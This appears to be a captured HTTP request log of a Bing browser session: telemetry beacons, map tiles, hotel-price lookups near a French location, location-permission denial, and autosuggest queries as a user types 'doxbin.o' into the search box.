GET https://www.bing.com/fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.Init%22%2C%22TS%22%3A1733306885327%2C%22Name%22%3A%22Base%22%2C%22FID%22%3A%22CI%22%7D%2C%7B%22Rtt%22%3A%22100%22%2C%22Downlink%22%3A%221.5%22%2C%22T%22%3A%22CI.NetworkPerformance%22%2C%22TS%22%3A1733306885327%2C%22Name%22%3A%22timinginfo%22%2C%22FID%22%3A%22NetworkPerformanceDetails%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306885341%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22EdgeSpoofing%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306885344%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22DM%22%7D%5D

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306885345%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22DARKMODE%22%7D%5D

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&Type=Event.ClientInst&DATA=[{%22T%22:%22Info%22,%22FID%22:%22CI%22,%22Name%22:%22ClientDimNotSent%22,%22Text%22:%221%22}]

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&Type=Event.ClientInst&DATA=[{%22T%22:%22Info%22,%22FID%22:%22CI%22,%22Name%22:%22HasRR%22,%22Text%22:%221%22}]

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&TYPE=Event.ClientInst&DATA=%5B%7B%22width%22%3A%221280%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306885347%2C%22Name%22%3A%22M%22%2C%22FID%22%3A%22BRW%22%7D%2C%7B%22height%22%3A%22601%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306885348%2C%22Name%22%3A%22S%22%2C%22FID%22%3A%22BRH%22%7D%2C%7B%22RawDPR%22%3A%221.0%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306885352%2C%22Name%22%3A%221.0%22%2C%22FID%22%3A%22DPR%22%7D%2C%7B%22T%22%3A%22CI.SCArrST%22%2C%22TS%22%3A1733306885353%2C%22Name%22%3A510%2C%22FID%22%3A%22SCArrST%22%7D%2C%7B%22Namespace%22%3A%22SearchHarder%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306885355%2C%22Name%22%3A%22ButtonHidden%22%2C%22FID%22%3A%22SearchHarderEntryPoint%22%7D%2C%7B%22T%22%3A%22CI.NumGuestFltrNotFound%22%2C%22TS%22%3A1733306885358%2C%22Name%22%3A%22NumGuestsFltrEvent%22%2C%22FID%22%3A%22HotelListing%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306885361%2C%22Name%22%3A%22VisibleOrDelayed%22%2C%22FID%22%3A%22BottomBanner%22%7D%2C%7B%22ID%22%3A%2263245%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306885362%2C%22Name%22%3A%22BottomBanner%22%2C%22FID%22%3A%22Mcp%22%7D%2C%7B%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1733306885362%2C%22Name%22%3A%22bnp.notif.shown%22%2C%22FID%22%3A%2263245%22%7D%2C%7B%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1733306885363%2C%22Name%22%3A%22InitializationStarted%22%2C%22FID%22%3A%2263245%22%7D%2C%7B%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1733306885363%2C%22Name%22%3A%22bnp.embed.ready%22%2C%22FID%22%3A%2263245%22%7D%2C%7B%22ID%22%3A%2263245%22%2C%22T%22%3A%22CI.BNPUxAssetIndex%22%2C%22TS%22%3A1733306885363%2C%22Name%22%3A0%2C%22FID%22%3A%22BNP%22%7D%2C%7B%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1733306885366%2C%22Name%22%3A1263%2C%22FID%22%3A%22ViewPortWidth%22%7D%2C%7B%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1733306885366%2C%22Name%22%3A%22OfferIdMissing%22%2C%22FID%22%3A%22BNPOfferId%22%7D%5D

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.EffectiveLocation%22%2C%22TS%22%3A1733306885366%2C%22Name%22%3A%22tryWriteEffectiveLocation%22%2C%22FID%22%3A%22EffectiveLocation%22%7D%5D

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.EffectiveLocation%22%2C%22TS%22%3A1733306885754%2C%22Name%22%3A%22WriteEffectiveLocationSuccess%22%2C%22FID%22%3A%22EffectiveLocation%22%7D%5D

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.SERPSB%22,%22FID%22:%22CI%22,%22Name%22:%22CharCount%22,%22Text%22:%225%22}]

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.SERPSB%22,%22FID%22:%22CI%22,%22Name%22:%22LandingRows%22,%22Text%22:%221%22}]

HTTP Request

GET https://www.bing.com/images/sbi?mmasync=1&ig=5AD7030C91584719B4F5E41231459495&iid=.5098&ptn=Web&ep=0&iconpl=1

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&TYPE=Event.ClientInst&DATA=%5B%7B%22Namespace%22%3A%22SearchHarder%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306885917%2C%22Name%22%3A%22ButtonHidden%22%2C%22FID%22%3A%22SearchHarderEntryPoint%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1733306886085%2C%22Name%22%3A%22OrgId%22%2C%22FID%22%3A%22NoSignInAttempt%22%7D%2C%7B%22Time%22%3A1750%2C%22time%22%3A1753%2C%22T%22%3A%22CI.Latency%22%2C%22TS%22%3A1733306886097%2C%22Name%22%3A%22Loaded%22%2C%22FID%22%3A%22HP%22%7D%5D

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&TYPE=Event.ClientInst&DATA=%5B%7B%22comp%22%3A%22loaded%22%2C%22time%22%3A1753%2C%22T%22%3A%22CI.Data%22%2C%22TS%22%3A1733306886098%2C%22Name%22%3A%22speech%22%2C%22FID%22%3A%22HP%22%7D%5D

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&TYPE=Event.ClientInst&DATA=%5B%7B%22micComponent%22%3A%22rendered%22%2C%22time%22%3A1753%2C%22T%22%3A%22CI.Data%22%2C%22TS%22%3A1733306886098%2C%22Name%22%3A%22speech%22%2C%22FID%22%3A%22HP%22%7D%5D

HTTP Request

POST https://www.bing.com/rewardsapp/ncheader?ver=51619320&IID=SERP.5055&IG=5AD7030C91584719B4F5E41231459495

HTTP Request

POST https://www.bing.com/rewardsapp/reportActivity?IG=5AD7030C91584719B4F5E41231459495&IID=SERP.5064&q=onjon&cvid=0e0e04224c204a07ae85e85e161201dd&aqs=edge..69i57j0l6.6041j0j4&FORM=ANAB01&PC=U531

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://www.bing.com/maps/geoplat/REST/v1/Imagery/Map/RoadVibrant/48.329134,4.234374/10?ms=622,150&ml=Basemap,LandCover,Landmarks,OsmBuildings&key=AnTcaqBi2ypp0xI-OZNi4W_ik2KhjgpqioTAtXLC8GzkMBQRMlyxvxyTnd5b73im&c=en-US&od=2&shading=hill&logo=n&da=ro&fmt=png&pp=48.32417678833008,4.305159091949463;S8;%C2%A399&pp=48.36305618286133,4.332777976989746;S552;&pp=48.29521179199219,4.135970115661621;S8;%C2%A339&pp=48.32417678833008,4.305159091949463;S8;%C2%A399&pp=48.328407287597656,4.115884780883789;S8;%C2%A362&pp=48.42100524902344,4.479507923126221;S8;%C2%A366&pp=48.33100891113281,4.099302768707275;S8;%C2%A373&pp=48.45736312866211,4.123088836669922;S8;%C2%A367&pp=48.42161560058594,4.480012893676758;S8;%C2%A375&&ppsc=dpsp,htp

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&TYPE=Event.ClientInst&DATA=%5B%7B%22correlationId%22%3A%2267502a0dbd8a4adf97b2602b33527ef5%22%2C%22T%22%3A%22CI.acclink%22%2C%22TS%22%3A1733306886104%2C%22Name%22%3A%22loadJsModule%22%2C%22FID%22%3A%22init%22%7D%2C%7B%22correlationId%22%3A%2267502a0dbd8a4adf97b2602b33527ef5%22%2C%22T%22%3A%22CI.acclink%22%2C%22TS%22%3A1733306886104%2C%22Name%22%3A%22undirectflow%22%2C%22FID%22%3A%22init%22%7D%2C%7B%22T%22%3A%22CI.OpalUpsell%22%2C%22TS%22%3A1733306886128%2C%22Name%22%3A%22Show%22%2C%22FID%22%3A%2214utojb6_14yb1dlu%22%7D%2C%7B%22T%22%3A%22CI.OpalUpsell%22%2C%22TS%22%3A1733306886129%2C%22Name%22%3A%22overlap%22%2C%22FID%22%3A%22Hide%22%7D%2C%7B%22T%22%3A%22CI.OpalUpsell%22%2C%22TS%22%3A1733306886129%2C%22Name%22%3A%22overlap%22%2C%22FID%22%3A%22Hide%22%7D%2C%7B%22T%22%3A%22CI.OpalUpsell%22%2C%22TS%22%3A1733306886129%2C%22Name%22%3A%22ShowBubble%22%2C%22FID%22%3A%2214utojb6_14yb1dlu%22%7D%2C%7B%22osBuildVersion%22%3A%5B%2210%22%2C%220%22%2C%2222000%22%5D%2C%22isWin11OrHigher%22%3A%22true%22%2C%22fullOsBuild%22%3A%2210.0.22000%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306886140%2C%22Name%22%3A%22OSBuild%22%2C%22FID%22%3A%22OSBuild%22%7D%2C%7B%22Namespace%22%3A%22SearchHarder%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306886161%2C%22Name%22%3A%22ButtonHidden%22%2C%22FID%22%3A%22SearchHarderEntryPoint%22%7D%2C%7B%22Namespace%22%3A%22SearchHarder%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306886370%2C%22Name%22%3A%22ButtonHidden%22%2C%22FID%22%3A%22SearchHarderEntryPoint%22%7D%2C%7B%22T%22%3A%22CI.Tab%22%2C%22TS%22%3A1733306886420%2C%22Name%22%3A%221%22%2C%22FID%22%3A%22count%22%7D%2C%7B%22T%22%3A%22CI.Price%22%2C%22TS%22%3A1733306886510%2C%22Name%22%3A%22OCardCount%5B6%5D%22%2C%22FID%22%3A%22HotelPrices%22%7D%2C%7B%22ypid%22%3A%22YN2000x1190976147452155201%22%2C%22T%22%3A%22CI.Price%22%2C%22TS%22%3A1733306886510%2C%22Name%22%3A%22%C2%A399%22%2C%22FID%22%3A%22HotelPrices%22%7D%5D

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&TYPE=Event.ClientInst&DATA=%5B%7B%22ypid%22%3A%22YN1545x256073263%22%2C%22T%22%3A%22CI.Price%22%2C%22TS%22%3A1733306886510%2C%22Name%22%3A%22%22%2C%22FID%22%3A%22HotelPrices%22%7D%5D

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&TYPE=Event.ClientInst&DATA=%5B%7B%22ypid%22%3A%22YN2000x6096471577638952817%22%2C%22T%22%3A%22CI.Price%22%2C%22TS%22%3A1733306886510%2C%22Name%22%3A%22%C2%A339%22%2C%22FID%22%3A%22HotelPrices%22%7D%5D

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&TYPE=Event.ClientInst&DATA=%5B%7B%22ypid%22%3A%22YN1544x243384812%22%2C%22T%22%3A%22CI.Price%22%2C%22TS%22%3A1733306886510%2C%22Name%22%3A%22%C2%A362%22%2C%22FID%22%3A%22HotelPrices%22%7D%5D

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&TYPE=Event.ClientInst&DATA=%5B%7B%22ypid%22%3A%22YN2000x9391523170225958935%22%2C%22T%22%3A%22CI.Price%22%2C%22TS%22%3A1733306886510%2C%22Name%22%3A%22%C2%A366%22%2C%22FID%22%3A%22HotelPrices%22%7D%5D

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22thumb_tum34%22}]

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22thumb_f34%22}]

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22sb_feedback%22}]

HTTP Response

200

HTTP Response

200

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx?

HTTP Request

GET https://www.bing.com/local/hotelprice?q=Hotels&filters=local_filters%3a%22UR4U%22+hotel_filters%3a%22LHP-0_HHP-%C2%A3500+_SD-01192025_ED-01202025%22+segment%3a%22Hotel%22+cacheid%3a%22ced0929c-c686-46b0-b6e9-a16678105547%22&count=100&htlsource=localhp&originig=5AD7030C91584719B4F5E41231459495&inDate=01/19/2025&outDate=01/20/2025&localypids=YN2000x1190976147452155201|48.32417678833008|4.305159091949463,YN1545x256073263|48.36305618286133|4.332777976989746,YN2000x6096471577638952817|48.29521179199219|4.135970115661621,YN2000x1190976147452155201|48.32417678833008|4.305159091949463,YN1544x243384812|48.328407287597656|4.115884780883789,YN2000x9391523170225958935|48.42100524902344|4.479507923126221,YN2000x4457774376323358039|48.33100891113281|4.099302768707275,YN2000x10959879645415552720|48.45736312866211|4.123088836669922,YN2000x11722354772439687545|48.42161560058594|4.480012893676758

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&TYPE=Event.ClientInst&DATA=%5B%7B%22SuppressingFeature%22%3A%22HotelsLGWidget%22%2C%22T%22%3A%22CI.LeftGutterUtility%22%2C%22TS%22%3A1733306886757%2C%22Name%22%3A%22LGSuppressed%22%2C%22FID%22%3A%22HotelsLGWidget%22%7D%2C%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1733306886940%2C%22Name%22%3A%22PromptDevLoc%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1733306886941%2C%22Name%22%3A%22Perm_Available%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

HTTP Response

204

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&TYPE=Event.ClientInst&DATA=%5B%7B%22Text%22%3A%220%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306886977%2C%22Name%22%3A%22web%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%221%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306886977%2C%22Name%22%3A%22conv%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%222%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306886977%2C%22Name%22%3A%22images%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%223%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306886977%2C%22Name%22%3A%22video%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%224%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306886977%2C%22Name%22%3A%22local%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%225%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306886977%2C%22Name%22%3A%22news%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%226%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306886977%2C%22Name%22%3A%22shop%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%227%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306886977%2C%22Name%22%3A%22flights%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%228%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306886977%2C%22Name%22%3A%22travelhub%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%229%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306886977%2C%22Name%22%3A%22hotels%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%2210%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306886977%2C%22Name%22%3A%22realestate%22%2C%22FID%22%3A%22DynScopeRank%22%7D%5D

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&TYPE=Event.ClientInst&DATA=%5B%7B%22Fallback%22%3A%221%22%2C%22IsRewardUser%22%3A%22%22%2C%22IsAutoOpenFlyout%22%3A%22%22%2C%22SuppressionReason%22%3A%22NoTrigger%3AMuidTrialNotEnoughPoints%22%2C%22FID%22%3A%22ModernRewardsFlyout%22%2C%22EventName%22%3A%22AutoOpenFlyoutFired%22%2C%22T%22%3A%22CI.Init%22%2C%22TS%22%3A1733306886977%2C%22Name%22%3A%22AutoOpenFlyoutFired%22%7D%5D

HTTP Request

GET https://www.bing.com/maps/geoplat/REST/v1/Imagery/Map/RoadVibrant/48.395556,4.281667/10?ms=344,128&ml=Basemap,LandCover,Landmarks,OsmBuildings&key=AnTcaqBi2ypp0xI-OZNi4W_ik2KhjgpqioTAtXLC8GzkMBQRMlyxvxyTnd5b73im&c=en-US&fmt=jpeg&od=1&shading=hill&logo=n&da=ro&pp=48.395556,4.281667;S593|SelectedPointState

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://www.bing.com/geolocation/write?isBlocked=true&sid=1389AFCAD5F46BB6263EBA81D45C6A43&clientsid=undefined

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1733306887026%2C%22Name%22%3A%22Perm_Denied%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1733306887027%2C%22Name%22%3A%22block%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1733306887027%2C%22Name%22%3A%22tryBlock%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

HTTP Request

GET https://www.bing.com/maps/mapcontrol/v9/overlay?callback=initializeMap&partner=serp&branch=experimental

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1733306887183%2C%22Name%22%3A%22BlockSuccess%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

HTTP Response

200

HTTP Request

POST https://www.bing.com/orgid/idtoken/conditional

HTTP Request

GET https://www.bing.com/maps/mapcontrol/v9/style?styleid=road&uid=22989428392729&og=2578&lang=en-GB&mkt=en-GB&ur=gb&stlversion=9.33&rm=0&hcm=none&partner=serp&branch=experimental

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://www.bing.com/secure/Passport.aspx?popup=1&ssl=1

HTTP Response

200

HTTP Request

GET https://www.bing.com/maps/instrumentation?version=V9&q=&feature=omo

HTTP Response

200

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx?

HTTP Request

GET https://www.bing.com/ipv6test/test?FORM=MONITR

HTTP Response

204

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22tdd_feedback%22}]

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22tdd_exit%22}]

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://www.bing.com/th?id=OBFB.1B096C6DCB92C2B9A732929A92AF5585&pid=Fb&qlt=99&r=0

HTTP Request

GET https://www.bing.com/th?id=OBFB.1E928B2B86E3D4E8ED1D46B83E667303&pid=Fb&qlt=99&r=0

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.ASBundleLoad%22%2C%22TS%22%3A1733306887192%2C%22Name%22%3A%22AutoSuggestBootstrap%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22LoadTime%22%3A%221016.4999999979045%22%2C%22T%22%3A%22CI.AutosuggestBootstrapLoaded%22%2C%22TS%22%3A1733306887195%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22LoadTime%22%3A%222847.5000000034925%22%2C%22T%22%3A%22CI.AutosuggestJSBundleLoaded%22%2C%22TS%22%3A1733306887195%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22T%22%3A%22CI.NumGuestFltrNotFound%22%2C%22TS%22%3A1733306887838%2C%22Name%22%3A%22NumGuestsFltrEvent%22%2C%22FID%22%3A%22HotelListing%22%7D%2C%7B%22ID%22%3A%2263245%22%2C%22T%22%3A%22CI.Click%22%2C%22TS%22%3A1733306889198%2C%22Name%22%3A%22RejectAll%22%2C%22FID%22%3A%22Mcp%22%7D%5D

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx?

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22mapsOptOut%22}]

HTTP Response

204

HTTP Response

204

HTTP Response

200

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx

HTTP Response

204

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx

HTTP Response

204

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx

HTTP Response

204

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx

HTTP Response

204

HTTP Request

GET https://www.bing.com/qbox?query=d&language=en-US&pt=EdgBox&cvid=3e9d1f0e90bd4b45aaa059bd0cd1dc49&ig=054b6f8b047b48b38ec55fbf2efc2c02&oit=1&cp=1&pgcl=9

HTTP Response

200

HTTP Request

GET https://www.bing.com/qbox?query=do&language=en-US&pt=EdgBox&cvid=3e9d1f0e90bd4b45aaa059bd0cd1dc49&ig=a14190e59dc340209069b860e2bbcda2&oit=1&cp=2&pgcl=9

HTTP Request

GET https://www.bing.com/qbox?query=dox&language=en-US&pt=EdgBox&cvid=3e9d1f0e90bd4b45aaa059bd0cd1dc49&ig=dafa1e88f5cb49d88c7f3e2b6b407c53&oit=1&cp=3&pgcl=9

HTTP Response

200

HTTP Request

GET https://www.bing.com/qbox?query=doxb&language=en-US&pt=EdgBox&cvid=3e9d1f0e90bd4b45aaa059bd0cd1dc49&ig=ee2a0013a1884656907f054b822edafc&oit=1&cp=4&pgcl=9

HTTP Response

200

HTTP Request

GET https://www.bing.com/qbox?query=doxbi&language=en-US&pt=EdgBox&cvid=3e9d1f0e90bd4b45aaa059bd0cd1dc49&ig=c8ef83434c484c5fa1aff10525e68c55&oit=1&cp=5&pgcl=9

HTTP Response

200

HTTP Request

GET https://www.bing.com/qbox?query=doxbin&language=en-US&pt=EdgBox&cvid=3e9d1f0e90bd4b45aaa059bd0cd1dc49&ig=e0a1783b40e0485790488376a50d7a29&oit=1&cp=6&pgcl=9

HTTP Response

200

HTTP Request

GET https://www.bing.com/qbox?query=doxbino&language=en-US&pt=EdgBox&cvid=3e9d1f0e90bd4b45aaa059bd0cd1dc49&ig=c184a01a9cea40eaa35d751cf790d89a&oit=1&cp=7&pgcl=9

HTTP Response

200

HTTP Request

GET https://www.bing.com/qbox?query=doxbinor&language=en-US&pt=EdgBox&cvid=3e9d1f0e90bd4b45aaa059bd0cd1dc49&ig=163a659216a240a78064a5eda70846ad&oit=1&cp=8&pgcl=9

HTTP Response

200

HTTP Request

GET https://www.bing.com/qbox?query=doxbinorg&language=en-US&pt=EdgBox&cvid=3e9d1f0e90bd4b45aaa059bd0cd1dc49&ig=27a7069321914624af49b9d23b27f02d&oit=1&cp=9&pgcl=9

HTTP Response

200

HTTP Request

GET https://www.bing.com/qbox?query=doxbinor&language=en-US&pt=EdgBox&cvid=3e9d1f0e90bd4b45aaa059bd0cd1dc49&ig=f79fa214d9aa4cd08dd8890460bf3de2&oit=1&cp=8&pgcl=9

HTTP Response

200

HTTP Request

GET https://www.bing.com/qbox?query=doxbino&language=en-US&pt=EdgBox&cvid=3e9d1f0e90bd4b45aaa059bd0cd1dc49&ig=5ac21664b75840c2825cc45b4a31af24&oit=1&cp=7&pgcl=9

HTTP Response

200

HTTP Request

GET https://www.bing.com/qbox?query=doxbin&language=en-US&pt=EdgBox&cvid=3e9d1f0e90bd4b45aaa059bd0cd1dc49&ig=0bf26158462c4de686453cccf227419c&oit=1&cp=6&pgcl=9

HTTP Response

200

HTTP Request

GET https://www.bing.com/qbox?query=doxbin.&language=en-US&pt=EdgBox&cvid=3e9d1f0e90bd4b45aaa059bd0cd1dc49&ig=52e6a0a09641422d907124749137fcfb&oit=1&cp=7&pgcl=9

HTTP Response

200

HTTP Request

GET https://www.bing.com/qbox?query=doxbin.o&language=en-US&pt=EdgBox&cvid=3e9d1f0e90bd4b45aaa059bd0cd1dc49&ig=0402ebae98f34ade8dd2200a5c81b00d&oit=1&cp=8&pgcl=9

HTTP Response

200

HTTP Request

